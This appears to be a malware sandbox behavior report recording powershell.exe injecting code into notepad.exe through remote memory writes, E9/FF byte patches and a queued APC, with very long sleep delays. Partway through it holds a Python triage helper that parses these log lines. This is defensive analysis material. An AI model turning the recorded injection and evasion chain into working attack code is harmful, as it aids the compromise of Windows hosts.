              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX (127 times)
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOX (31 times)
              Source: C:\Windows\System32\notepad.exeMemory allocated: 1D114A50000 memory reserve | memory write watch
              Source: C:\Windows\System32\notepad.exeMemory allocated: 1D12CC50000 memory reserve | memory write watch
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\notepad.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4258
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5436
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2436Thread sleep time: -12912720851596678s >= -30000s
              Source: C:\Windows\System32\notepad.exe TID: 4396Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\notepad.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\notepad.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\notepad.exeMemory allocated: page read and write | page guard
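The delay values above and the injection chain listed under the next heading are easier to reason about once the glued "Source: <process><event>: <details>" lines are parsed. The value 922337203685477 equals floor((2^63 - 1) / 10^4), i.e. Int64.MaxValue in 100 ns ticks expressed in milliseconds, which is consistent with an effectively unbounded wait rather than a timed sleep. The Python triage helper below is an added example, not Joe Sandbox code and not part of the sample; it runs over a constructed subset of this report's lines (the 62 consecutive single-byte writes into notepad.exe are regenerated rather than pasted), merges the per-byte remote writes into contiguous ranges, lists the writes that the report annotates with a value, checks that the same source process created the target suspended, wrote into it and queued an APC to it, and classifies the sleeps. The x86 opcode hints, the reading of the delay value as an infinite wait and the 180 s "long sleep" threshold are assumptions made here.

```python
"""Triage helper for Joe Sandbox style behavior lines (added example, not sandbox code)."""
import ntpath
import re
from collections import defaultdict

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
NP = r"C:\Windows\System32\notepad.exe"

# Constructed sample: a subset of this report's lines; the 62 consecutive
# single-byte writes (offsets 0x00..0x3D) are regenerated instead of pasted.
SAMPLE_LINES = [
    f"Source: {PS}Thread delayed: delay time: 922337203685477",
    f"Source: {NP} TID: 4396Thread sleep time: -922337203685477s >= -30000s",
    f"Source: {PS}Process created / APC Queued / Resumed: {NP}",
    f"Source: {PS}Memory written: PID: 3300 base: 1D112FC001B value: E9",
    f"Source: {PS}Memory written: PID: 3300 base: 1D112FC0055 value: FF",
    f"Source: {PS}Memory written: PID: 3300 base: 1D112FC013D value: E9",
    f"Source: {PS}Thread APC queued: target process: {NP}",
] + [f"Source: {PS}Memory written: {NP} base: {0x1D112FC0000 + i:X}" for i in range(62)]

# The HTML-to-text extraction glues the process path to the event name; split on ".exe".
LINE_RE = re.compile(r"^Source: (?P<src>.+?\.exe)(?: TID: (?P<tid>\d+))?"
                     r"(?P<event>[A-Z][^:]*?): ?(?P<rest>.*)$")
WRITE_RE = re.compile(r"^(?P<target>.+?\.exe) base: (?P<addr>[0-9A-F]+)$")
PATCH_RE = re.compile(r"^PID: (?P<pid>\d+) base: (?P<addr>[0-9A-F]+) value: (?P<val>[0-9A-F]{2})$")
# Assumption: meaning of the byte if it is the first byte of an x86 instruction.
OPCODE_HINT = {0xE9: "jmp rel32", 0xFF: "FF group (indirect jmp/call, push, inc/dec)"}
# Int64.MaxValue in 100 ns ticks, expressed in ms: what an infinite wait reports as (assumption).
INFINITE_MS = (2**63 - 1) // 10_000
LONG_SLEEP_MS = 180_000  # 3 min threshold assumed here
DELAY_RE = re.compile(r"(-?\d+)")


def parse_events(lines):
    """Return (source process, event name, detail text) for every parseable line."""
    out = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            out.append((m["src"], m["event"], m["rest"]))
    return out


def write_ranges(events):
    """Merge per-byte remote writes into (start, end, byte_count) ranges per (source, target)."""
    addrs = defaultdict(set)
    for src, event, rest in events:
        m = WRITE_RE.match(rest) if event == "Memory written" else None
        if m:
            addrs[(src, m["target"])].add(int(m["addr"], 16))
    ranges = {}
    for key, seen in addrs.items():
        merged, start, prev = [], None, None
        for a in sorted(seen):
            if start is None or a != prev + 1:      # gap: close the current range
                if start is not None:
                    merged.append((start, prev, prev - start + 1))
                start = a
            prev = a
        merged.append((start, prev, prev - start + 1))
        ranges[key] = merged
    return ranges


def opcode_patches(events):
    """Remote writes the report annotates with a value: the control-flow hijack evidence."""
    out = []
    for src, event, rest in events:
        m = PATCH_RE.match(rest) if event == "Memory written" else None
        if m:
            b = int(m["val"], 16)
            out.append((int(m["pid"]), int(m["addr"], 16), b, OPCODE_HINT.get(b, "?")))
    return out


def early_bird_chains(events):
    """(source, target) pairs with suspended create, remote write and APC queue from one source."""
    created, wrote, apc = set(), set(), set()
    for src, event, rest in events:
        if event == "Process created / APC Queued / Resumed":
            created.add((src, rest))
        elif event == "Memory written" and (m := WRITE_RE.match(rest)):
            wrote.add((src, m["target"]))
        elif event == "Thread APC queued" and rest.startswith("target process: "):
            apc.add((src, rest[len("target process: "):]))
    return sorted(created & wrote & apc)


def classify_delay(value):
    """Label a reported delay; sign is ignored because relative NT timeouts are negative."""
    if abs(value) >= INFINITE_MS:
        return "effectively infinite"
    return "long" if abs(value) >= LONG_SLEEP_MS else "short"


def delays(events):
    """(source, raw value, label) for every sleep-related event."""
    return [(src, int(DELAY_RE.search(rest).group(1)), classify_delay(int(DELAY_RE.search(rest).group(1))))
            for src, event, rest in events if event in ("Thread delayed", "Thread sleep time")]


if __name__ == "__main__":
    ev = parse_events(SAMPLE_LINES)
    for (src, tgt), rs in write_ranges(ev).items():
        for s, e, n in rs:
            print(f"{ntpath.basename(src)} -> {ntpath.basename(tgt)}: {s:X}-{e:X} ({n} bytes)")
    for pid, addr, b, hint in opcode_patches(ev):
        print(f"PID {pid}: {addr:X} <- {b:02X} ({hint})")
    print("early bird chains:", [(ntpath.basename(s), ntpath.basename(t)) for s, t in early_bird_chains(ev)])
    for src, v, label in delays(ev):
        print(f"{ntpath.basename(src)}: {v} ({label})")
```

Run as-is it prints one merged range (1D112FC0000 to 1D112FC003D, 62 bytes), the three valued writes (the first of which falls inside that range), the powershell.exe to notepad.exe chain and the two sleeps classified as effectively infinite. To triage a full report, pass its text through `parse_events(text.splitlines())`; the ranges then show whether the writes continue past the 0x3D offset visible on this page, and the patch addresses can be compared against the written ranges to see which bytes were overwritten after the initial copy.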

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\System32\notepad.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3300 base: 1D112FC001B value: E9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3300 base: 1D112FC0055 value: FF
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3300 base: 1D112FC0093 value: FF
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3300 base: 1D112FC013D value: E9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3300 base: 1D112FC0165 value: FF
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\System32\notepad.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0001
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0002
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0003
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0004
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0005
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0006
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0007
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0008
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0009
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC000A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC000B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC000C
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC000D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC000E
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC000F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0010
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0011
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0012
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0013
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0014
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0015
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0016
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0017
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0018
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0019
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC001A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC001B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC001C
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC001D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC001E
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC001F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0020
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0021
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0022
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0023
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0024
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0025
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0026
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0027
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0028
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0029
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC002A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC002B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC002C
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC002D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC002E
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC002F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0030
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0031
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0032
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0033
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0034
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0035
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0036
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0037
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0038
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0039
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC003A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC003B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC003C
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC003D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC003EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC003FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0040Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0041Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0042Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0043Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0044Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0045Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0046Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0047Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0048Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0049Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC004AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC004BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC004CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC004DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC004EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC004FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0050Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0051Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0052Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0053Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0054Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0055Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0056Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0057Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0058Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0059Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC005AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC005BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC005CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC005DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC005EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC005FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0060Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0061Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0062Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0063Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0064Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0065Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0066Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0067Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0068Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0069Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC006AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC006BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC006CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC006DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC006EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC006FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0070Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0071Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0072Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0073Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0074Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0075Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0076Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0077Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0078Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0079Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC007AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC007BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC007CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC007DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC007EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC007FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0080Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0081Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0082Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0083Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0084Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0085Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0086Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0087Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0088Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0089Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC008AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC008BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC008CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC008DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC008EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC008FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0090Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0091Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0092Jump to behavior
